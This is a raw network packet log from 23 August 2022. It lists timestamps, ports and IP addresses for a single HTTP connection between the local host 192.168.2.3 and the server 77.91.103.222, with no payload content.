Aug 23, 2022 18:24:03.229378939 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.229382038 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.229402065 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.229428053 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.229438066 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.229440928 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.229450941 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.229475021 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.229496956 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.229497910 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.229501009 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.229521036 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.229548931 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.229559898 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.229563951 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.229577065 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.229603052 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.229626894 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.229628086 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.229631901 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.229635000 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.229650974 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.229674101 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.229681969 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.229684114 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.229697943 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.229721069 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.229737043 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.229739904 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.229744911 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.229769945 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.229782104 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.229785919 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.229789019 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.229795933 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.229821920 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.229845047 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.229851007 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.229854107 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.229870081 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.229895115 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.229916096 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.229918957 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.229918957 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.229932070 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.229942083 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.229967117 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.229970932 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.229973078 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.229991913 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.230000019 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.230017900 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.230041027 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.230063915 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.230070114 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.230072975 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.230076075 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.230087996 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.230112076 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.230130911 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.230134010 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.230135918 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.230135918 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.230159998 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.230185032 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.230202913 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.230206966 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.230209112 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.230209112 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.230232954 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.230256081 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.230273008 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.230277061 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.230278969 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.230281115 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.230307102 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.230314016 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.230331898 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.230351925 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.230370998 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.230397940 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.230397940 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.230423927 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.230474949 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.230501890 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.230525970 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.230547905 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.230550051 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.230551958 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.230555058 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.230571985 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.230577946 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.230601072 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.230627060 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.230640888 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.230643988 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.230645895 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.230650902 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.230674982 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.230700970 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.230720997 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.230725050 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.230726957 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.230762005 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.230880022 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.230989933 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.231014967 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.231035948 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.231059074 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.231064081 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.231066942 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.231091976 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.231148005 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.231152058 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.231162071 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.231187105 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.231209993 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.231232882 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.231255054 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.231259108 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.231260061 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.231264114 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.231296062 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.231312990 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.231317043 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.231319904 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.231343985 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.231374025 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.231378078 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.231410980 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.231431961 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.231460094 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.231463909 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.231467962 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.231482983 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.231504917 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.231533051 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.231538057 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.231540918 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.231626034 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.272948980 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.272985935 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.273010969 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.273034096 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.273058891 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.273082018 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.273107052 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.273122072 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.273130894 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.273134947 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.273169041 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.273171902 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.275944948 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.275974989 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.275995970 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.276016951 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.276041031 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.276061058 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.276068926 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.276077986 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.276083946 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.276119947 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.276134968 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.276221037 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.276245117 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.276268959 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.276293039 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.276293993 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.276298046 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.276318073 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.276329994 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.276334047 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.276340961 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.276362896 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.276387930 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.276412010 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.276413918 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.276417017 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.276434898 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.276458979 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.276480913 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.276480913 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.276484966 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.276489019 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.276504993 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.276519060 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.276530027 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.276530027 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.276551962 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.276556015 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.276577950 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.276591063 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.276595116 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.276602030 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.276626110 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.276649952 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.276662111 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.276667118 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.276669025 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.276674986 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.276696920 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.276721001 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.276732922 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.276737928 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.276741982 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.276745081 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.276767969 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.276792049 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.276813030 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.276815891 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.276817083 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.276820898 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.276838064 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.276863098 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.276875019 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.276879072 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.276880980 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.276885033 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.276916981 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.276918888 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.276932001 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.276942968 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.276963949 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.276983976 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.276984930 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.276988983 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277007103 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277031898 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277049065 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277055025 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277057886 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277060986 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277079105 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277103901 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277115107 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277118921 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277121067 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277127981 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277152061 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277175903 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277189016 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277194977 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277199030 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277200937 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277225971 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277251005 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277261972 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277266026 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277268887 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277276039 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277298927 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277323008 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277329922 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277333975 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277347088 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277348042 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277371883 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277371883 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277395964 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277411938 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277415991 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277419090 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277442932 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277466059 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277487040 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277488947 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277493000 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277496099 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277498007 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277509928 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277534962 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277550936 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277554989 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277559042 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277585030 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277609110 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277622938 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277626991 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277628899 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277631044 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277657032 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277662039 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277667046 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277682066 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277705908 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277714968 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277719021 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277729034 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277750969 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277771950 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277790070 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277796030 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277796984 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277802944 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277806044 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277822018 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277847052 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277859926 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277863979 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277870893 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277894974 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277919054 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277930975 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277935982 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277939081 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.277945042 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277970076 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.277995110 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278008938 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278013945 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278016090 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278021097 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278044939 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278070927 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278083086 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278088093 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278090000 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278095007 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278107882 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278116941 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278141022 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278155088 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278160095 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278163910 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278187990 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278222084 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278244019 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278244972 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278249979 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278253078 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278264999 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278290987 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278294086 CEST	49844	80	192.168.2.3	77.91.103.222
